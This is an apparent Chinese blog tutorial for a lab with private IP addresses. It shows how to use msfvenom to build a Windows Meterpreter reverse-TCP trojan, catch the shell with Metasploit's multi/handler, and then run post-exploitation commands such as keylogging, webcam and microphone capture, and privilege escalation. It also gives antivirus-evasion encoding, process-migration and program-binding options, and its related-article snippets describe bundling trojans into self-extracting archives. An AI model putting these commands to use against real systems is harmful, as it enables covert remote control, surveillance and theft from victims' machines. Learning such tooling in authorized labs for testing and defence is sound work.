首页 > 其他分享 >MSF生成远控木马

MSF生成远控木马

时间:2023-11-12 23:33:06浏览次数:42  
标签:exe payload 远控 木马 msfvenom MSF 监听

实验环境:

靶机Windows server 2003   192.168.242.129

攻击机kali  192.168.242.131

实验工具:Metasploit Framework(MSF)

实验过程:

确定攻击机和靶机之间连通性

 

利用msfvenom生成远控木马

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。

可以使用msfvenom -h查看所有参数

 常用参数

–p (--payload-options):                                添加载荷payload。
    --lhost:监听的地址
    --lport:监听的端口
–a:                                                    选择架构平台  x86 、x64 、 x86_64
    --platform:                                        选择平台,windows、Linux
–e:                                                    使用编码进行免杀,如使用 x86/shikata_ga_nai 编码
–i:                                                    编码的次数
–b:                                                    避免使用的字符 例如:不使用 '\x00\'。
PrependMigrate=true PrependMigrateProc=svchost.exe:    使这个木马默认会迁移到 svchost.exe 进程
–f :                                                   输出文件格式,如 exe、c、elf、macho、raw、asp、aspx、
–l:                                                    查看所有payload encoder nops。
–o:                                                    文件输出
–s:                                                    生成payload的最大长度,就是文件大小。
–c:                                                    添加自己的shellcode
–x | -k:                                               捆绑,可以指定捆绑的程序进行伪装;

使用msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.242.131 lport=4444 -f exe -o hack.exe     #lhost是攻击机的主机ip,lport是攻击机的用于监听的端口

 成功生成hack.exe木马程序

使用MSF监听木马反弹过来的shell

msfconsole  //启动
​
use exploit/multi/handler  //开启监听 
​
set payload windows/meterpreter/reverse_tcp  //设置payload,选择漏洞利用模块,跟生成木马的payload对应
​
set lhost 192.168.242.131  //本地IP,即攻击IP
​
set lport 4444  //监听端口
​
exploit   //攻击

启动msfconsole,并配置好payload

 想办法把hack.exe放到靶机上运行(木马复制到靶机,或者开启http服务下载木马都可以)

MSF执行exploit,靶机执行木马程序

 成功监听到shell,可以控制目标服务器

 常用命令

getuid      查看当前权限
getsystem   尝试获取system权限
shell       获取当前权限shell会话
ps          列出正在运行的进程
pkill       按名称终止进程
kill        按PID终止进程
reboot      重启
shutdown    关机
upload      上传文件(格式参考:upload /root/1.txt -> d:/)
download    下载文件(格式参考:download c:/1.txt -> /root/)
keyboard_send   令对方键盘输入(参考格式:keyboard_send ilovecc)
#请按以下顺序执行
keyscan_start   开始捕获击键(开始键盘记录)
keyscan_dump    转储按键缓冲(下载键盘记录)
keyscan_stop    停止捕获击键(停止键盘记录)
#操作完都会有文件保存在服务器,一般是存在/root目录下,msf会提示具体位置和名称,提到本机就可打开看
record_mic      麦克风录制(格式参考:record_mic -d 13)
screenshot      截图截取对方目前桌面的截图
webcam_snap     摄像头拍摄一张照片
webcam_stream   持续监控摄像头

参考链接:
MSF生成木马实现远控 - ʚɞ无恙 - 博客园 (cnblogs.com)
【精选】msf-Msfvenonm生成后门木马-CSDN博客

标签:exe,payload,远控,木马,msfvenom,MSF,监听
From: https://www.cnblogs.com/byzd/p/17828162.html

相关文章

  • 自解压捆绑木马上线
    自解压捆绑木马使用CS生成一个木马文件将木马跟一个正常的文件捆绑在一起,当点捆绑生成的EXE文件就会执行木马和正常的文件。选中木马文件和一个正常的文件,选择添加到压缩文件常规-勾选创建自解压格式压缩文件并修改压缩文件名高级-点击自解压选项常规-填写解压路径设置-......
  • Gh0st木马
    https://www.secrss.com/articles/50209 Gh0st是一种远程控制软件,它可以在被攻击的计算机上运行并允许攻击者远程控制该计算机。为了查找Gh0st的进程、文件、注册表等信息,您可以采取以下步骤:查找Gh0st的进程:打开任务管理器,查看正在运行的进程列表,如果发现可疑的进程名称,例如......
  • 实战攻防演练-利用长亭百川云平台上线远控提权
    前言长亭百川云平台是北京长亭未来科技有限公司旗下的SaaS产品服务平台,专注于云安全解决方案。其提供牧云·主机管理助手、网站监测、牧云·云原生安全平台、雷池Web应用防火墙等一系列在线安全产品,帮助企业用户更轻松地治理云安全问题,使云上业务更加安全可靠。在使用中发现......
  • MSFvenom恶意程序生成与利用
    MSFvenom1.1MSFvenom介绍MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom包含标准的命令行选项。可以为许多平台生成有效负载,如Android,Win......
  • MSF与CS互相派生
    目录CS与MSF互相派生CS派生给MSF使用CS建立监听MSF接收CS派生MSF派生给CS使用MSF建立监听CS与MSF互相派生CS派生给MSF使用CS建立监听创建CS监听端口利用创建的CS端口生成控制器设法传至受害机并进行运行,收到请求建立转发给MSF的监听端口MSF接收CS派生配置MSF使......
  • 网安--暴力破解工具(wfuzz、hydra、medusa、msf)
    1、wfuzz 2、hydra  3、Medusa    4、msf辅助模块 ......
  • centos搭建msf
    搭建msf官方有提供一键安装脚本,如下:curlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb>msfinstall&&chmod755msfinstall&&./msfinstall等安装成功直接输入msfconsole就可以运......
  • MSF恶意程序利用【实战】
    ★关于道德伦理的忠告★关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。以下内容摘自《Metasploit渗透测试指南》作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:不要进行恶意的攻击;不要......
  • 记一次Linux服务器上查杀木马经历
    开篇前言    Linux服务器一直给我们的印象是安全、稳定、可靠,性能卓越。由于一来Linux本身的安全机制,Linux上的病毒、木马较少,二则由于宣称Linux是最安全的操作系统,导致很多人对Linux的安全性有个误解:以为它永远不会感染病毒、木马;以为它没有安全漏洞。所以很多Linux服务器......
  • msf扫描靶机上mysql服务的空密码
    我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.146.136 登录 Metasploitable2-Linux 系统用户名 root,密码:123456 输入 ipa 查看 ip 地址 登录Kali开始搜索模块msf6>searchmysql_login加载模块msf6>useauxiliary/scanner/mysql/......